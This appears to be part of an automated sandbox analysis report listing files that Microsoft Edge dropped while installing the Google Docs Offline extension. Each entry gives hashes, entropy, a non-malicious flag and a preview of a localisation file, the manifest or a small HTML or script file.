Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11280
Entropy (8bit):	5.754230909218899
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsN9Jtwg1MK8HNnswuHEIIMuuqd7CKqv+pccW5SJ+:m8IGIEu8RfW+
MD5:	BE5DB35513DDEF454CE3502B6418B9B4
SHA1:	C82B23A82F745705AA6BCBBEFEB6CE3DBCC71CB1
SHA-256:	C6F623BE1112C2FDE6BE8941848A82B2292FCD2B475FBD363CC2FD4DF25049B5
SHA-512:	38C48E67631FAF0594D44525423C6EDC08F5A65F04288F0569B7CF8C71C359924069212462B0A2BFA38356F93708143EE1CBD42295D7317E8670D0A0CD10BAFD
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417689528134667
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1e9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APegiVb
MD5:	10FF8E5B674311683D27CE1879384954
SHA1:	9C269C14E067BB86642EB9F4816D75CF1B9B9158
SHA-256:	17363162A321625358255EE939F447E9363FF2284BD35AE15470FD5318132CA9
SHA-512:	4D3EB89D398A595FEA8B59AC6269A57CC96C4A0E5A5DB8C5FE70AB762E8144A5DF9AFC8756CA2E798E50778CD817CC9B0826FC2942DE31397E858DBFA1B06830
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (4369)
Category:	dropped
Size (bytes):	95567
Entropy (8bit):	5.4016395763198135
Encrypted:	false
SSDEEP:	1536:Ftd/mjDC/Hass/jCKLwPOPO2MCeYHxU2/NjAGHChg3JOzZ8:YfjCKdHm2/NbHCIJo8
MD5:	09AF2D8CFA8BF1078101DA78D09C4174
SHA1:	F2369551E2CDD86258062BEB0729EE4D93FCA050
SHA-256:	39D113C44D45AE3609B9509ED099680CC5FCEF182FD9745B303A76E164D8BCEC
SHA-512:	F791434B053FA2A5B731C60F22A4579F19FE741134EF0146E8BAC7DECAC78DE65915B3188093DBBE00F389A7F15B80172053FABB64E636DD4A945DBE3C2CF2E6
Malicious:	false
